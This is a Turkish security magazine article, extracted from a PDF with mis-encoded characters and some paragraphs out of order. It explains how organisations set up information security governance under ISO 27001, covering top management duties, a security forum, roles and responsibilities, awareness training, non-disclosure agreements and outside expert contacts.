kontrollerinin s›raland›¤› “Ek A” bölümü tüm kontrolleri
onbir ayr› ana bafll›kta ele al›r. Bu yaz› ve ilgili ana bafll›k
temel olarak iki kontrol hedefini, kurum içindeki organizasyonu ve d›fl taraflarla koordinasyonu hedefliyor.
Gün geçtikçe bilgiye ba¤›ml› hale gelen kurumlardaki
yöneticiler, ayn› zamanda karmafl›klaflan ifl süreçleri
nedeniyle klasik yönetim biçimlerini matriks yönetime ya
da yatay ve dikey kritik baflar› faktörlerine (KPI) b›rak›rken,
benzer bir ihtiyac›n bilgi güvenli¤inin de bafl›na gelece¤ini
planlamam›fllard›. Ancak üretimden sat›fla, finanstan
araflt›rma gelifltirmeye, hemen tüm ifl süreçleri nas›l eskiden
bir departman ismi iken, bugün farkl› çal›flma gruplar›n›n
bir arada çal›flmalar›n› ve etkileflim gerektiriyorsa, bilgi
güvenli¤i de farkl› gruplar›n bir arada çal›flmas›na ba¤l›
olarak ilerleyebilir. Üstelik sadece bilgi güvenli¤i kapsam›
içindeki süreçler yönetimleri ve bölümleri de¤il, ilgili tüm
destek bölümleri de genel bilgi güvenli¤i organizasyonu
içinde yer almal›lar.
Hemen her konuda oldu¤u gibi, bilgi güvenli¤i konusunda
da üst yönetim, kurum içi organizasyonun parças› olmal›.
Gerekli kurumsal yönlendirmeyi, sorumluluk atamalar›n›
gerçeklefltirmeli. Kurumun büyüklü¤üne ve kurumsallaflma
düzeyine göre bu destek farkl›laflabilir. Az kiflinin çal›flt›¤›,
hiyerarflik yönetim yap›s›n›n geliflmedi¤i kurumlarda, direkt
üst yönetim bu görevi üstlenirken; büyük, hiyerarflik düzenin yer ald›¤› kurumsal organizasyonlarda bu görev, bir
“üst yönetim temsilcisi” taraf›ndan da gerçeklefltirilebilir.
Yönetim birinci önceli¤i, bilgi güvenli¤i hedeflerinin aç›k
ve net biçimde tüm çal›flanlara aktar›lmas›d›r. Bu ifllem
öncelikle bilgi güvenli¤i politikas› ile gerçeklefltirilse de,
fark›ndal›k e¤itimleri ve di¤er bilgilendirici mesajlar (email ve di¤er kurumsal iletiflim araçlar›) bu amaçla
kullan›labillir. Bilgi güvenli¤i politikas›n›n onaylanmas› ve
yay›nlanmas› kadar güncel kalmas› ve gözden geçirilmesi
de üst yönetim sorumluluklar› aras›nda yer al›r. Bu say›da
detayland›rmayacak olsak da üst yönetimin önemli görevlerinden biri de gerekli ifl gücü ve kaynaklar› “Bilgi Güvenli¤i
Yönetim Sistemi” için ay›rmakt›r.
Üst yönetim tek bafl›na Bilgi Güvenli¤i Yönetim Sistemi’nin
koordinasyonunu üstlenemez. Bu yüzden kurum içindeki
tüm ilgili departman temsilcilerinden oluflan bir “Bilgi
Güvenli¤i Forumu” (BGF) (‹sim önemli de¤il, ifllevi ayn›
oldu¤u sürece herhangi bir isim kullanmak mümkün.)
kurulmal›d›r. BGF üyeleri, farkl› departmanlardan ve süreç
sahiplerinden oluflur. Genellikle bilgi güvenli¤i kapsam›nda
yer alan tüm bölümlerin ve kapsamda yer almasa bile Bilgi
‹fllem, ‹dari ‹fller gibi destek süreçleri temsilcilerinden
oluflur.
Bilgi güvenli¤inin kurum içinde koordinasyonu birçok kiflinin
birlikte hareket etmesi ile mümkündür. Bu amaçla düzenlenen bilgi güvenli¤i politika beyannamesine ek olarak, görev
ve sorumluluklar›n tan›mlanmas› gereklidir. Görev ve
sorumluluklar sadece bilgi güvenli¤i forum üyelerinin
çal›flmalar›n› de¤il, BGYS ile ilgili tüm tam zamanl›, yar›
zamanl› ve d›fl kaynak personelini düzenlemeyi de içine
almal›d›r. Burada bahsi geçen görev ve sorumluluklar
sadece “bilgiyi korumal›” gibi genel beklentileri de¤il, bilgi
güvenli¤i süreçlerinin çal›flmas›n› sa¤layacak “de¤iflim
yönetimi”, “olay yönetimi” gibi temel süreçler içinde
bireylerin görev ve sorumluluklar›n› da içermelidir.
‹kinci Beyaz fiapka say›s›na gönderdi¤im yaz›da Bilgi
güvenli¤inin üç ana bacak üzerinde yükseldi¤ini ve bu
bacaklar›n eflit güçte olmalar› ile dengeli ve sa¤lam bir
yap› kurulabilece¤ini anlatm›flt›m. Teknoloji, Süreç ve
‹nsan. Teknolojinin getirdiklerini de¤erlendiremiyorsak,
yap›n›n düzgün çal›flmas› için gerekli süreçleri devreye
alam›yorsak ya da çal›flanlar›m›z görev ve sorumluluklar›n›n bilincinde de¤illerse bilgi güvenli¤inin kal›c›l›¤›ndan
bahsetmek do¤ru olmaz. Bu yaz›da da insanlarla ilgili
koordinasyon ve organizasyonu ele ald›¤›m›za göre,
kiflilere görev ve sorumluluklar›n iyi anlat›lmas›n› sa¤layacak, bu konudaki “fark›ndal›k”lar›n› art›racak çal›flmalar›n önemini vurgulamak gerekli. Basit bir s›n›f e¤itiminden kapsaml› bir ESAM çal›flmas›na kadar yap›labilecekler
oldukça genifl bir yelpazeye da¤›l›yor. Ancak önemli olan
sadece e¤itim yapmak de¤il, süreklili¤ini sa¤larken
baflar›s›n› da ölçecek altyap›y› kurmak ve takip etmektir.
Hem kurum içindeki çal›flanlar, hem d›flar›dan gelen dan›flmanlar, d›fl kaynak personeli hem de tedarikciler (ve hatta
müflteriler) bilgi varl›klar›na iflleri do¤rultusuna eriflebilirler
ve eriflmeliler. Ancak bu varl›klar› korumak için sorumlu
olduklar›n›n vurgulanmas› önemlidir. Gizlilik anlaflmalar›
(non-disclosure agreement) bu amaçla yap›l›r. Hatta
ABD’deki silikon vadisinde rakip firmalarda çal›flanlar›n,
hatta çiftlerin, akflam yemekleri öncesinde içki ile a¤›zlar›ndan kaç›rabilecekleri s›rlar› korumak için birbirlerine gizlilik anlaflmalar› imzalatt›klar› söylenir. Gizlilik anlaflmalar›
bir kurum için standart maddelerden oluflmal›d›r. Bu farkl›
anlaflmalarda hukuk, ilgili tüm gruplar›n iflini kolaylaflt›r›r.
Bu maddeler herhangi bir anlaflman›n içine eklenebilecekleri gibi, tek bafl›na bir doküman olarak da haz›rlan›p
imzalanabilir.
itfaiye birimlerini kuruyorlar, yine de uzmanl›k görüflü
için bölgesel itfaiye birimlerinden düzenli yard›m
al›yorlarsa; bilgi güvenli¤i konusunda da benzer bir
çaban›n gösterilmesi oldukça yararl›d›r.
Bu amaçla ilk yap›lmas› gereken, kimlerle ba¤lant›ya
geçilece¤inin tespit edilmesidir. Kapsam içindeki varl›klar›n
incelenmesi, farkl› varl›k türleri, iflletim sistemleri, fiziksel
riskler vb. s›ralanmal›d›r. Bu liste genellikle fiziksel güvenlik
için güvenlik güçleri, belediye, itfaiye ve sa¤l›k hizmetlerini;
bilgi ifllem konusunda üretici firmalar› ve genel bilgi
güvenli¤i ile ilgili olarak da SANS.org ve BilgiGuvenligi.org
gibi organizasyonlar› içerir. Daha sonra kurum içinde
görev tan›m›nda belirtilmifl kifliler ve gruplar kendi
sorumluluk/ilgi alanlar›na göre hangi yöntemle düzenli
bilgi al›flverifli içinde bulunabildiklerini belirlerler.
Teknolojiye yak›n konular genellikle RSS ve e-posta
gruplar› gibi ‹nternet tabanl› çözümleri seçerken, hukuk,
devlet gibi ba¤lant›lar dönemsel toplant›lar fleklinde
gerçekleflebilir.
Afla¤›da bu yazd›klar›m›z›n k›sa bir özeti yer almakta. Bu
yaz›da bilgi güvenli¤i yönetim sistemi kurulufl, iflletim ve
ilerletme aflamalar›nda önemli bir konuyu detayland›rmaya çal›flt›m. Önümüzdeki say›da görüflmek üzere,
güvenli günler.
*Bilgi güvenli¤inin koordinasyonu için gerçeklefltirilmesi
gerekenler:
1. Bilgi Güvenli¤i Forumu (BGF) kurulmas›
2. Bilgi Güvenli¤i (ve BGF) görev ve sorumluluklar›n›n
tan›mlanmas›
‹lgili anlaflma metinlerinin haz›rlanmas› ve güncel
tutulmas› kadar kimlerle ne zaman imzaland›¤›, nerede
arflivlendi¤i gibi kay›t bilgilerinin de tutulmas› önemlidir.
Bu takibin zorlu¤u nedeniyle bugün bir çok büyük kurum,
benim de destekledi¤im uygulamayla; arflivlerle u¤raflmak
yerine, her f›rsatta ayn› kiflilere bile benzer metni imzalama flart› getiriyorlar. Fark›ndal›k çal›flmalar›na da yard›mc›
olan bu durum d›flar›dan gelen kiflilerin kurum bilgi
güvenli¤i kurallar›n› hat›rlamalar›na ve özen göstermelerine de neden oluyor.
3. Bilgi Güvenli¤i fark›ndal›k çal›flmalar›n›n
bafllat›lmas›/sürdürülmesi
Bilgi güvenli¤inin kapal› bir kutu gibi, kurum içindeki bilgi
ile sa¤lanmas› oldukça güç. Nas›l büyük fabrikalar kendi
*Bu liste örnektir. Her kurum kendi kültürüne uygun çözümü gelifltirmelidir.
4. Güncel gizlilik anlaflma taslaklar›n›n haz›rlanmas›,
ilgililere imzalat›lmas› ve takip edilmesi
5. Kulland›¤›m›z teknoloji ve bulundu¤umuz sektörle
ilgili uzman gruplarla düzenli iletiflimin kurulmas›
Bilgi Güvenli¤i’nin Organizasyonu ve Koordinasyonu
Agu’07 eskiz-6 7/31/07 12:35 AM Page 16
Bilgi Güvenli¤i Uzmanları ve
Bilgi ‹fllem Yöneticilerinin güvenlik platformu
Beyaz fiapka Dergisi,
7. say›ya ulaflt›.
Bilgi Güvenli¤i alan›nda her geçen gün
artan geliflmeleri yetkin a¤›zlardan
takip etmek için ücretsiz abone olun.
www.beyazsapka.org

Agu`07 eskiz-6 - Nebula Bilişim

Transkript

Benzer belgeler

Ulusal bilgi ve ileti im güvenli i (BG), Türk BG Ekipmanı

The Holy See

BASIN BÜLTENİ

ÖZELL‹KLER‹ KAL‹TE: